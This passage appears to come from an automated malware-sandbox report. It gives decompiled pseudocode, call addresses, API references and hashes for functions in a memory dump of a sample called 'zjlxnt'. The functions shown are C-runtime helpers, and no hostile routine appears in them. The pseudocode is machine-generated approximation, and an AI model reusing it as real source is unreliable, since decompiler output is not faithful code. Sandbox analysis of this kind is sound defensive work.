                                                          0x00402a32
                                                          0x00402a17
                                                          0x00402a1e
                                                          0x00402a24
                                                          0x00402a27
                                                          0x00402a3b
                                                          0x00402a3d
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00402a27
                                                          0x00402a40
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004029ff
                                                          0x004029ec
                                                          0x00402a48
                                                          0x00402a52
                                                          0x004029ca
                                                          0x004029cc
                                                          0x004029cc

                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,004029B8,004027E8,00401E66), ref: 004029CF
                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004029DD
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004029F6
                                                          • SetLastError.KERNEL32(00000000,004029B8,004027E8,00401E66), ref: 00402A48
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.571904550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastValue___vcrt_
                                                          • String ID:
                                                          • API String ID: 3852720340-0
                                                          • Opcode ID: 70247efa9ed0a105f5c3cc4c9e138fb419d640718360533235fe7f9ad7db5892
                                                          • Instruction ID: 078a338927bebc8a57084cdf0b2594a36b0b0cb36656b2d2252d312e3d5e2cf0
                                                          • Opcode Fuzzy Hash: 70247efa9ed0a105f5c3cc4c9e138fb419d640718360533235fe7f9ad7db5892
                                                          • Instruction Fuzzy Hash: FA012832308A119EE63566B9AE8D5AB2F44EB45338B20023FF510755E1EFFD4C01699C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 25%
                                                          			E00404F84(intOrPtr _a4) {
                                                          				char _v16;
                                                          				signed int _v20;
                                                          				signed int _t11;
                                                          				int _t14;
                                                          				void* _t16;
                                                          				void* _t20;
                                                          				int _t22;
                                                          				signed int _t23;
                                                          
                                                          				_t11 =  *0x415010; // 0x93c85c54
                                                          				 *[fs:0x0] =  &_v16;
                                                          				_v20 = _v20 & 0x00000000;
                                                          				_t14 =  &_v20;
                                                          				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], 0x40d42f, 0xffffffff);
                                                          				if(_t14 != 0) {
                                                          					_t14 = GetProcAddress(_v20, "CorExitProcess");
                                                          					_t22 = _t14;
                                                          					if(_t22 != 0) {
                                                          						 *0x40e160(_a4);
                                                          						_t14 =  *_t22();
                                                          					}
                                                          				}
                                                          				if(_v20 != 0) {
                                                          					_t14 = FreeLibrary(_v20);
                                                          				}
                                                          				 *[fs:0x0] = _v16;
                                                          				return _t14;
                                                          			}











                                                          0x00404f99
                                                          0x00404fa4
                                                          0x00404faa
                                                          0x00404fae
                                                          0x00404fb9
                                                          0x00404fc1
                                                          0x00404fcb
                                                          0x00404fd1
                                                          0x00404fd5
                                                          0x00404fdc
                                                          0x00404fe2
                                                          0x00404fe2
                                                          0x00404fd5
                                                          0x00404fe8
                                                          0x00404fed
                                                          0x00404fed
                                                          0x00404ff6
                                                          0x00405000

                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,93C85C54,?,?,00000000,0040D42F,000000FF,?,00404F60,00000002,?,00404F34,004057DD), ref: 00404FB9
                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00404FCB
                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,0040D42F,000000FF,?,00404F60,00000002,?,00404F34,004057DD), ref: 00404FED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.571904550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 44008817a766496d30a0b71b405d55bf33a24efc73ce07632b22a39922047233
                                                          • Instruction ID: f45cf89818bd8daf17f7f5fa5db09656c02fb6dca8b021926776a3611c212177
                                                          • Opcode Fuzzy Hash: 44008817a766496d30a0b71b405d55bf33a24efc73ce07632b22a39922047233
                                                          • Instruction Fuzzy Hash: 1101A771914626EBDB119F51DC05FAEBBB8FB44715F00493AE811B22D0DBB89900CB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 58%
                                                          			E00409AC0(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
                                                          				signed int _v8;
                                                          				intOrPtr _v12;
                                                          				void* _v24;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t40;
                                                          				intOrPtr _t45;
                                                          				signed int _t48;
                                                          				void* _t51;
                                                          				signed int _t55;
                                                          				intOrPtr _t64;
                                                          				intOrPtr _t69;
                                                          				void* _t72;
                                                          				intOrPtr _t73;
                                                          				intOrPtr _t89;
                                                          				void* _t90;
                                                          				intOrPtr* _t92;
                                                          				void* _t94;
                                                          				intOrPtr* _t95;
                                                          				signed int _t96;
                                                          				void* _t97;
                                                          				intOrPtr* _t98;
                                                          				intOrPtr* _t100;
                                                          				void* _t103;
                                                          
                                                          				_push(__ecx);
                                                          				_push(__ecx);
                                                          				_t40 =  *0x415010; // 0x93c85c54
                                                          				_v8 = _t40 ^ _t96;
                                                          				_t89 = _a20;
                                                          				if(_t89 > 0) {
                                                          					_t69 = E0040AE45(_a16, _t89);
                                                          					_t103 = _t69 - _t89;
                                                          					_t4 = _t69 + 1; // 0x1
                                                          					_t89 = _t4;
                                                          					if(_t103 >= 0) {
                                                          						_t89 = _t69;
                                                          					}
                                                          				}
                                                          				_t71 = _a32;
                                                          				if(_a32 == 0) {
                                                          					_t71 =  *((intOrPtr*)( *_a4 + 8));
                                                          					_a32 =  *((intOrPtr*)( *_a4 + 8));
                                                          				}
                                                          				_t45 = E004073AA(_t71, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t89, 0, 0);
                                                          				_t98 = _t97 + 0x18;
                                                          				_v12 = _t45;
                                                          				if(_t45 == 0) {
                                                          					L38:
                                                          					_pop(_t90);
                                                          					_pop(_t94);
                                                          					_pop(_t72);
                                                          					return E004018D4(_t45, _t72, _v8 ^ _t96, 0x400, _t90, _t94);
                                                          				} else {
                                                          					_t16 = _t45 + _t45 + 8; // 0x8
                                                          					asm("sbb eax, eax");
                                                          					_t48 = _t45 + _t45 & _t16;
                                                          					if(_t48 == 0) {
                                                          						_t95 = 0;
                                                          						L36:
                                                          						_t73 = 0;
                                                          						L37:
                                                          						E00407EE5(_t95);
                                                          						_t45 = _t73;
                                                          						goto L38;
                                                          					}
                                                          					if(_t48 > 0x400) {
                                                          						_t95 = E00407D48(_t48);
                                                          						if(_t95 == 0) {
                                                          							goto L36;
                                                          						}
                                                          						 *_t95 = 0xdddd;
                                                          						L12:
                                                          						if(_t95 == 0) {
                                                          							goto L36;
                                                          						}
                                                          						_t51 = E004073AA(_t71, 1, _a16, _t89, _t95, _v12);
                                                          						_t100 = _t98 + 0x18;
                                                          						if(_t51 == 0) {
                                                          							goto L36;
                                                          						}
                                                          						_t91 = _v12;
                                                          						_t73 = E004085AD(_a8, _a12, _t95, _v12, 0, 0, 0, 0, 0);
                                                          						if(_t73 == 0) {
                                                          							goto L36;
                                                          						}
                                                          						if((_a12 & 0x00000400) == 0) {
                                                          							_t30 = _t73 + _t73 + 8; // 0x8
                                                          							asm("sbb eax, eax");
                                                          							_t55 = _t73 + _t73 & _t30;
                                                          							if(_t55 == 0) {
                                                          								_t92 = 0;
                                                          								L34:
                                                          								E00407EE5(_t92);
                                                          								goto L36;
                                                          							}
                                                          							if(_t55 > 0x400) {
                                                          								_t92 = E00407D48(_t55);
                                                          								if(_t92 == 0) {
                                                          									goto L34;
                                                          								}
                                                          								 *_t92 = 0xdddd;
                                                          								L26:
                                                          								_t92 = _t92 + 8;
                                                          								if(_t92 == 0 || E004085AD(_a8, _a12, _t95, _v12, _t92, _t73, 0, 0, 0) == 0) {
                                                          									goto L34;
                                                          								} else {
                                                          									_push(0);
                                                          									_push(0);
                                                          									if(_a28 != 0) {
                                                          										_push(_a28);
                                                          										_push(_a24);
                                                          									} else {
                                                          										_push(0);
                                                          										_push(0);
                                                          									}
                                                          									_push(_t73);
                                                          									_push(_t92);
                                                          									_push(0);
                                                          									_push(_a32);
                                                          									_t73 = E00407464();
                                                          									if(_t73 == 0) {
                                                          										goto L34;
                                                          									} else {
                                                          										E00407EE5(_t92);
                                                          										goto L37;
                                                          									}
                                                          								}
                                                          							}
                                                          							E004018F0(_t55);
                                                          							_t92 = _t100;
                                                          							if(_t92 == 0) {
                                                          								goto L34;
                                                          							}
                                                          							 *_t92 = 0xcccc;
                                                          							goto L26;
                                                          						}
                                                          						_t64 = _a28;
                                                          						if(_t64 == 0) {
                                                          							goto L37;
                                                          						}
                                                          						if(_t73 > _t64) {
                                                          							goto L36;
                                                          						}
                                                          						_t73 = E004085AD(_a8, _a12, _t95, _t91, _a24, _t64, 0, 0, 0);
                                                          						if(_t73 != 0) {
                                                          							goto L37;
                                                          						}
                                                          						goto L36;
                                                          					}
                                                          					E004018F0(_t48);
                                                          					_t95 = _t98;
                                                          					if(_t95 == 0) {
                                                          						goto L36;
                                                          					}
                                                          					 *_t95 = 0xcccc;
                                                          					goto L12;
                                                          				}
                                                          			}




























                                                          0x00409ac5
                                                          0x00409ac6
                                                          0x00409ac7
                                                          0x00409ace
                                                          0x00409ad4
                                                          0x00409ad9
                                                          0x00409adf
                                                          0x00409ae5
                                                          0x00409ae8
                                                          0x00409ae8
                                                          0x00409aeb
                                                          0x00409aed
                                                          0x00409aed
                                                          0x00409aeb
                                                          0x00409aef
                                                          0x00409af4
                                                          0x00409afb
                                                          0x00409afe
                                                          0x00409afe
                                                          0x00409b1a
                                                          0x00409b1f
                                                          0x00409b22
                                                          0x00409b27
                                                          0x00409c9d
                                                          0x00409ca0
                                                          0x00409ca1
                                                          0x00409ca2
                                                          0x00409cae
                                                          0x00409b2d
                                                          0x00409b2f
                                                          0x00409b34
                                                          0x00409b36
                                                          0x00409b38
                                                          0x00409c90
                                                          0x00409c92
                                                          0x00409c92
                                                          0x00409c94
                                                          0x00409c95
                                                          0x00409c9b
                                                          0x00000000
                                                          0x00409c9b
                                                          0x00409b43
                                                          0x00409b62
                                                          0x00409b67
                                                          0x00000000
                                                          0x00000000
                                                          0x00409b6d
                                                          0x00409b73
                                                          0x00409b78
                                                          0x00000000
                                                          0x00000000
                                                          0x00409b89
                                                          0x00409b8e
                                                          0x00409b93
                                                          0x00000000
                                                          0x00000000
                                                          0x00409b99
                                                          0x00409bb0
                                                          0x00409bb4
                                                          0x00000000
                                                          0x00000000
                                                          0x00409bc2
                                                          0x00409bff
                                                          0x00409c04
                                                          0x00409c06
                                                          0x00409c08
                                                          0x00409c85
                                                          0x00409c87
                                                          0x00409c88
                                                          0x00000000
                                                          0x00409c8d
                                                          0x00409c0c
                                                          0x00409c27
                                                          0x00409c2c
                                                          0x00000000
                                                          0x00000000
                                                          0x00409c2e
                                                          0x00409c34
                                                          0x00409c34
                                                          0x00409c39
                                                          0x00000000
                                                          0x00409c55
                                                          0x00409c57
                                                          0x00409c58
                                                          0x00409c5c
                                                          0x00409c7d
                                                          0x00409c80
                                                          0x00409c5e
                                                          0x00409c5e
                                                          0x00409c5f
                                                          0x00409c5f
                                                          0x00409c60
                                                          0x00409c61
                                                          0x00409c62
                                                          0x00409c63
                                                          0x00409c6b
                                                          0x00409c72
                                                          0x00000000
                                                          0x00409c74
                                                          0x00409c75
                                                          0x00000000
                                                          0x00409c7a
                                                          0x00409c72
                                                          0x00409c39
                                                          0x00409c0e
                                                          0x00409c13
                                                          0x00409c17
                                                          0x00000000
                                                          0x00000000
                                                          0x00409c19
                                                          0x00000000
                                                          0x00409c19
                                                          0x00409bc4
                                                          0x00409bc9
                                                          0x00000000
                                                          0x00000000
                                                          0x00409bd1
                                                          0x00000000
                                                          0x00000000
                                                          0x00409bed
                                                          0x00409bf1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00409bf7
                                                          0x00409b45
                                                          0x00409b4a
                                                          0x00409b4e
                                                          0x00000000
                                                          0x00000000
                                                          0x00409b54
                                                          0x00000000
                                                          0x00409b54

                                                          APIs
                                                          • __alloca_probe_16.LIBCMT ref: 00409B45
                                                          • __alloca_probe_16.LIBCMT ref: 00409C0E
                                                          • __freea.LIBCMT ref: 00409C75
                                                            • Part of subcall function 00407D48: HeapAlloc.KERNEL32(00000000,00406E77,?,?,00406E77,00000220,?,00000000,?), ref: 00407D7A
                                                          • __freea.LIBCMT ref: 00409C88
                                                          • __freea.LIBCMT ref: 00409C95
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.571904550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: __freea$__alloca_probe_16$AllocHeap
                                                          • String ID:
                                                          • API String ID: 1096550386-0
                                                          • Opcode ID: 203c5a0c63d9791d079f05143f993492d4d9c7fc4e394339a7c0bb37c9071c4a
                                                          • Instruction ID: f5d5e5908dbe2b0eece80851408d63fed06286bdfdf7f28fe4aa87bf0313151d
                                                          • Opcode Fuzzy Hash: 203c5a0c63d9791d079f05143f993492d4d9c7fc4e394339a7c0bb37c9071c4a
                                                          • Instruction Fuzzy Hash: C351A172A042066FFB209F65CC85EBB36E9EF84714F15453EFC04B6292E638DC109669
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00402BE3(WCHAR* _a4) {
                                                          				struct HINSTANCE__* _t4;
                                                          
                                                          				_t4 = LoadLibraryExW(_a4, 0, 0x800);
                                                          				if(_t4 != 0) {
                                                          					return _t4;
                                                          				} else {
                                                          					if(GetLastError() != 0x57 || E00405A18(_a4, L"api-ms-", 7) == 0) {
                                                          						return 0;
                                                          					}
                                                          					return LoadLibraryExW(_a4, 0, 0);
                                                          				}
                                                          			}




                                                          0x00402bf0
                                                          0x00402bf8
                                                          0x00402c2d
                                                          0x00402bfa
                                                          0x00402c03
                                                          0x00000000
                                                          0x00402c2a
                                                          0x00402c29
                                                          0x00402c29

                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00402B94,00000000,?,00415C98,?,?,?,00402D37,00000004,InitializeCriticalSectionEx,0040EC70,InitializeCriticalSectionEx), ref: 00402BF0
                                                          • GetLastError.KERNEL32(?,00402B94,00000000,?,00415C98,?,?,?,00402D37,00000004,InitializeCriticalSectionEx,0040EC70,InitializeCriticalSectionEx,00000000,?,00402AB7), ref: 00402BFA
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00402C22
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.571904550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad$ErrorLast
                                                          • String ID: api-ms-
                                                          • API String ID: 3177248105-2084034818
                                                          • Opcode ID: 6c1d3bad6412e7e4ca00ce12fd0f74fdde52119193a629733f7392a7739fe272
                                                          • Instruction ID: e589de4d7b83ec3a89ad76cef1a63b0294eee27024da7e6f7d3f22e711884464
                                                          • Opcode Fuzzy Hash: 6c1d3bad6412e7e4ca00ce12fd0f74fdde52119193a629733f7392a7739fe272
                                                          • Instruction Fuzzy Hash: 2CE01230644204B6FB111B62EE0AB1E3A54AB10B55F104831F90DB41E1EBF69964899C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 78%
                                                          			E00409F8D(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                          				char _v16;
                                                          				signed int _v20;
                                                          				char _v28;
                                                          				char _v35;
                                                          				signed char _v36;
                                                          				void _v44;
                                                          				signed char* _v48;
                                                          				char _v49;
                                                          				long _v56;
                                                          				long _v60;
                                                          				intOrPtr _v64;
                                                          				struct _OVERLAPPED* _v68;
                                                          				signed int _v72;
                                                          				signed char* _v76;
                                                          				signed int _v80;
                                                          				signed int _v84;
                                                          				intOrPtr _v88;
                                                          				void _v92;
                                                          				long _v96;
                                                          				signed char* _v100;
                                                          				void* _v104;
                                                          				char _v108;
                                                          				int _v112;
                                                          				intOrPtr _v116;
                                                          				struct _OVERLAPPED* _v120;
                                                          				struct _OVERLAPPED* _v124;
                                                          				struct _OVERLAPPED* _v128;
                                                          				struct _OVERLAPPED* _v132;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t174;
                                                          				signed int _t175;
                                                          				signed int _t177;
                                                          				int _t183;
                                                          				signed char* _t186;
                                                          				signed int _t190;
                                                          				signed char _t191;
                                                          				intOrPtr _t194;
                                                          				void* _t196;
                                                          				long _t197;
                                                          				long _t201;
                                                          				signed char* _t207;
                                                          				void _t209;
                                                          				signed char* _t214;
                                                          				void* _t221;
                                                          				char _t224;
                                                          				char* _t228;
                                                          				void* _t237;
                                                          				long _t243;
                                                          				signed int _t244;
                                                          				signed char* _t245;
                                                          				void* _t255;
                                                          				intOrPtr _t261;
                                                          				void* _t262;
                                                          				struct _OVERLAPPED* _t263;
                                                          				intOrPtr* _t264;
                                                          				signed int _t265;
                                                          				intOrPtr _t266;
                                                          				signed int _t271;
                                                          				struct _OVERLAPPED* _t274;
                                                          				signed int _t276;
                                                          				signed char _t281;
                                                          				signed int _t285;
                                                          				signed char* _t286;
                                                          				struct _OVERLAPPED* _t289;
                                                          				void* _t292;
                                                          				signed int _t293;
                                                          				signed int _t295;
                                                          				struct _OVERLAPPED* _t296;
                                                          				signed char* _t298;
                                                          				intOrPtr* _t299;
                                                          				void* _t300;
                                                          				signed int _t301;
                                                          				long _t302;
                                                          				signed int _t304;
                                                          				signed int _t305;
                                                          				void* _t306;
                                                          				void* _t307;
                                                          				void* _t308;
                                                          
                                                          				_push(0xffffffff);
                                                          				_push(0x40d469);
                                                          				_push( *[fs:0x0]);
                                                          				_t307 = _t306 - 0x74;
                                                          				_t174 =  *0x415010; // 0x93c85c54
                                                          				_t175 = _t174 ^ _t305;
                                                          				_v20 = _t175;
                                                          				_push(_t175);
                                                          				 *[fs:0x0] =  &_v16;
                                                          				_t177 = _a8;
                                                          				_t298 = _a12;
                                                          				_t261 = _a20;
                                                          				_t265 = (_t177 & 0x0000003f) * 0x38;
                                                          				_t285 = _t177 >> 6;
                                                          				_v100 = _t298;
                                                          				_v64 = _t261;
                                                          				_v72 = _t285;
                                                          				_v84 = _t265;
                                                          				_v104 =  *((intOrPtr*)(_t265 +  *((intOrPtr*)(0x4160f8 + _t285 * 4)) + 0x18));
                                                          				_v88 = _a16 + _t298;
                                                          				_t183 = GetConsoleOutputCP();
                                                          				_t309 =  *((char*)(_t261 + 0x14));
                                                          				_v112 = _t183;
                                                          				if( *((char*)(_t261 + 0x14)) == 0) {
                                                          					E00405940(_t261, _t285, _t309);
                                                          				}
                                                          				_t299 = _a4;
                                                          				_t266 =  *((intOrPtr*)( *((intOrPtr*)(_t261 + 0xc)) + 8));
                                                          				asm("stosd");
                                                          				_v116 = _t266;
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_t186 = _v100;
                                                          				_t286 = _t186;
                                                          				_v48 = _t286;
                                                          				if(_t186 < _v88) {
                                                          					_t293 = _v84;
                                                          					_t263 = 0;
                                                          					_v76 = 0;
                                                          					while(1) {
                                                          						_v49 =  *_t286;
                                                          						_t190 = _v72;
                                                          						_v68 = _t263;
                                                          						_v56 = 1;
                                                          						if(_t266 != 0xfde9) {
                                                          							goto L22;
                                                          						}
                                                          						_t274 = _t263;
                                                          						_t228 =  *(0x4160f8 + _t190 * 4) + 0x2e + _t293;
                                                          						_v76 = _t228;
                                                          						while( *_t228 != 0) {
                                                          							_t274 =  &(_t274->Internal);
                                                          							_t228 = _t228 + 1;
                                                          							if(_t274 < 5) {
                                                          								continue;
                                                          							}
                                                          							break;
                                                          						}
                                                          						_t295 = _v88 - _t286;
                                                          						_v56 = _t274;
                                                          						if(_t274 <= 0) {
                                                          							_t276 =  *((char*)(( *_t286 & 0x000000ff) + 0x415778)) + 1;
                                                          							_v80 = _t276;
                                                          							__eflags = _t276 - _t295;
                                                          							if(_t276 > _t295) {
                                                          								__eflags = _t295;
                                                          								if(_t295 <= 0) {
                                                          									goto L44;
                                                          								} else {
                                                          									_t301 = _v84;
                                                          									do {
                                                          										 *((char*)( *((intOrPtr*)(0x4160f8 + _v72 * 4)) + _t301 + _t263 + 0x2e)) =  *((intOrPtr*)(_t263 + _t286));
                                                          										_t263 =  &(_t263->Internal);
                                                          										__eflags = _t263 - _t295;
                                                          									} while (_t263 < _t295);
                                                          									goto L43;
                                                          								}
                                                          								L52:
                                                          							} else {
                                                          								_v132 = _t263;
                                                          								__eflags = _t276 - 4;
                                                          								_v128 = _t263;
                                                          								_v60 = _t286;
                                                          								_v56 = (_t276 == 4) + 1;
                                                          								_t237 = E0040AD3D( &_v132,  &_v68,  &_v60, (_t276 == 4) + 1,  &_v132, _v64);
                                                          								_t308 = _t307 + 0x14;
                                                          								__eflags = _t237 - 0xffffffff;
                                                          								if(_t237 != 0xffffffff) {
                                                          									_t293 = _v84;
                                                          									goto L21;
                                                          								}
                                                          							}
                                                          						} else {
                                                          							_t243 =  *((char*)(( *_v76 & 0x000000ff) + 0x415778)) + 1;
                                                          							_v60 = _t243;
                                                          							_t244 = _t243 - _t274;
                                                          							_v80 = _t244;
                                                          							if(_t244 > _t295) {
                                                          								__eflags = _t295;
                                                          								if(_t295 > 0) {
                                                          									_t245 = _v48;
                                                          									_t302 = _v56;
                                                          									do {
                                                          										_t281 =  *((intOrPtr*)(_t263 + _t245));
                                                          										_t286 =  *((intOrPtr*)(0x4160f8 + _v72 * 4)) + _v84 + _t263;
                                                          										_t263 =  &(_t263->Internal);
                                                          										_t286[_t302 + 0x2e] = _t281;
                                                          										__eflags = _t263 - _t295;
                                                          									} while (_t263 < _t295);
                                                          									L43:
                                                          									_t299 = _a4;
                                                          								}
                                                          								L44:
                                                          								 *(_t299 + 4) =  &(( *(_t299 + 4))[_t295]);
                                                          							} else {
                                                          								_t296 = _t263;
                                                          								_t264 = _v76;
                                                          								do {
                                                          									 *((char*)(_t305 + _t296 - 0x18)) =  *_t264;
                                                          									_t296 =  &(_t296->Internal);
                                                          									_t264 = _t264 + 1;
                                                          								} while (_t296 < _t274);
                                                          								_t303 = _v80;
                                                          								_t263 = 0;
                                                          								if(_v80 > 0) {
                                                          									E00403120( &_v28 + _t274, _t286, _t303);
                                                          									_t274 = _v56;
                                                          									_t307 = _t307 + 0xc;
                                                          								}
                                                          								_t293 = _v84;
                                                          								_t289 = _t263;
                                                          								_t304 = _v72;
                                                          								do {
                                                          									 *( *((intOrPtr*)(0x4160f8 + _t304 * 4)) + _t293 + _t289 + 0x2e) = _t263;
                                                          									_t289 =  &(_t289->Internal);
                                                          								} while (_t289 < _t274);
                                                          								_t299 = _a4;
                                                          								_v108 =  &_v28;
                                                          								_v124 = _t263;
                                                          								_v120 = _t263;
                                                          								_v56 = (_v60 == 4) + 1;
                                                          								_t255 = E0040AD3D( &_v124,  &_v68,  &_v108, (_v60 == 4) + 1,  &_v124, _v64);
                                                          								_t308 = _t307 + 0x14;
                                                          								if(_t255 != 0xffffffff) {
                                                          									L21:
                                                          									_t197 =  &(_v48[_v80]) - 1;
                                                          									L31:
                                                          									_v48 = _t197 + 1;
                                                          									_t201 = E00407464(_v112, _t263,  &_v68, _v56,  &_v44, 5, _t263, _t263);
                                                          									_t307 = _t308 + 0x20;
                                                          									_v60 = _t201;
                                                          									if(_t201 != 0) {
                                                          										if(WriteFile(_v104,  &_v44, _t201,  &_v96, _t263) == 0) {
                                                          											L50:
                                                          											 *_t299 = GetLastError();
                                                          										} else {
                                                          											_t286 = _v48;
                                                          											_t207 =  *((intOrPtr*)(_t299 + 8)) - _v100 + _t286;
                                                          											_v76 = _t207;
                                                          											 *(_t299 + 4) = _t207;
                                                          											if(_v96 >= _v60) {
                                                          												if(_v49 != 0xa) {
                                                          													L38:
                                                          													if(_t286 < _v88) {
                                                          														_t266 = _v116;
                                                          														continue;
                                                          													}
                                                          												} else {
                                                          													_t209 = 0xd;
                                                          													_v92 = _t209;
                                                          													if(WriteFile(_v104,  &_v92, 1,  &_v96, _t263) == 0) {
                                                          														goto L50;
                                                          													} else {
                                                          														if(_v96 >= 1) {
                                                          															 *((intOrPtr*)(_t299 + 8)) =  *((intOrPtr*)(_t299 + 8)) + 1;
                                                          															 *(_t299 + 4) =  &(( *(_t299 + 4))[1]);
                                                          															_t286 = _v48;
                                                          															_v76 =  *(_t299 + 4);
                                                          															goto L38;
                                                          														}
                                                          													}
                                                          												}
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          						goto L51;
                                                          						L22:
                                                          						_t271 =  *(0x4160f8 + _t190 * 4);
                                                          						_v80 = _t271;
                                                          						_t191 =  *((intOrPtr*)(_t271 + _t293 + 0x2d));
                                                          						__eflags = _t191 & 0x00000004;
                                                          						if((_t191 & 0x00000004) == 0) {
                                                          							_t271 =  *_t286 & 0x000000ff;
                                                          							_t194 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc))));
                                                          							__eflags =  *((intOrPtr*)(_t194 + _t271 * 2)) - _t263;
                                                          							if( *((intOrPtr*)(_t194 + _t271 * 2)) >= _t263) {
                                                          								_push(_v64);
                                                          								_push(1);
                                                          								_push(_t286);
                                                          								goto L29;
                                                          							} else {
                                                          								_t214 =  &(_t286[1]);
                                                          								_v60 = _t214;
                                                          								__eflags = _t214 - _v88;
                                                          								if(_t214 >= _v88) {
                                                          									 *((char*)(_v80 + _t293 + 0x2e)) =  *_t286;
                                                          									 *( *((intOrPtr*)(0x4160f8 + _v72 * 4)) + _t293 + 0x2d) =  *( *((intOrPtr*)(0x4160f8 + _v72 * 4)) + _t293 + 0x2d) | 0x00000004;
                                                          									 *(_t299 + 4) =  &(_v76[1]);
                                                          								} else {
                                                          									_t221 = E0040942F(_t271, _t286,  &_v68, _t286, 2, _v64);
                                                          									_t308 = _t307 + 0x10;
                                                          									__eflags = _t221 - 0xffffffff;
                                                          									if(_t221 != 0xffffffff) {
                                                          										_t197 = _v60;
                                                          										goto L31;
                                                          									}
                                                          								}
                                                          							}
                                                          						} else {
                                                          							_push(_v64);
                                                          							_v36 =  *(_t271 + _t293 + 0x2e) & 0x000000fb;
                                                          							_t224 =  *_t286;
                                                          							_v35 = _t224;
                                                          							 *((char*)(_t271 + _t293 + 0x2d)) = _t224;
                                                          							_push(2);
                                                          							_push( &_v36);
                                                          							L29:
                                                          							_push( &_v68);
                                                          							_t196 = E0040942F(_t271, _t286);
                                                          							_t308 = _t307 + 0x10;
                                                          							__eflags = _t196 - 0xffffffff;
                                                          							if(_t196 != 0xffffffff) {
                                                          								_t197 = _v48;
                                                          								goto L31;
                                                          							}
                                                          						}
                                                          						goto L51;
                                                          					}
                                                          				}
                                                          				L51:
                                                          				 *[fs:0x0] = _v16;
                                                          				_pop(_t292);
                                                          				_pop(_t300);
                                                          				_pop(_t262);
                                                          				__eflags = _v20 ^ _t305;
                                                          				return E004018D4(_t299, _t262, _v20 ^ _t305, _t286, _t292, _t300);
                                                          				goto L52;
                                                          			}



















































































                                                          0x00409f92
                                                          0x00409f94
                                                          0x00409f9f
                                                          0x00409fa0
                                                          0x00409fa3
                                                          0x00409fa8
                                                          0x00409faa
                                                          0x00409fb0
                                                          0x00409fb4
                                                          0x00409fba
                                                          0x00409fbf
                                                          0x00409fc5
                                                          0x00409fc8
                                                          0x00409fcb
                                                          0x00409fce
                                                          0x00409fd1
                                                          0x00409fd4
                                                          0x00409fde
                                                          0x00409fe5
                                                          0x00409fed
                                                          0x00409ff0
                                                          0x00409ff6
                                                          0x00409ffa
                                                          0x00409ffd
                                                          0x0040a001
                                                          0x0040a001
                                                          0x0040a009
                                                          0x0040a00e
                                                          0x0040a013
                                                          0x0040a014
                                                          0x0040a017
                                                          0x0040a018
                                                          0x0040a019
                                                          0x0040a01c
                                                          0x0040a01e
                                                          0x0040a024
                                                          0x0040a02a
                                                          0x0040a02d
                                                          0x0040a02f
                                                          0x0040a032
                                                          0x0040a034
                                                          0x0040a037
                                                          0x0040a03a
                                                          0x0040a03d
                                                          0x0040a04a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040a057
                                                          0x0040a05c
                                                          0x0040a05e
                                                          0x0040a061
                                                          0x0040a066
                                                          0x0040a067
                                                          0x0040a06b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040a06b
                                                          0x0040a070
                                                          0x0040a072
                                                          0x0040a077
                                                          0x0040a12b
                                                          0x0040a12c
                                                          0x0040a12f
                                                          0x0040a131
                                                          0x0040a2e9
                                                          0x0040a2eb
                                                          0x00000000
                                                          0x0040a2ed
                                                          0x0040a2ed
                                                          0x0040a2f0
                                                          0x0040a2ff
                                                          0x0040a303
                                                          0x0040a304
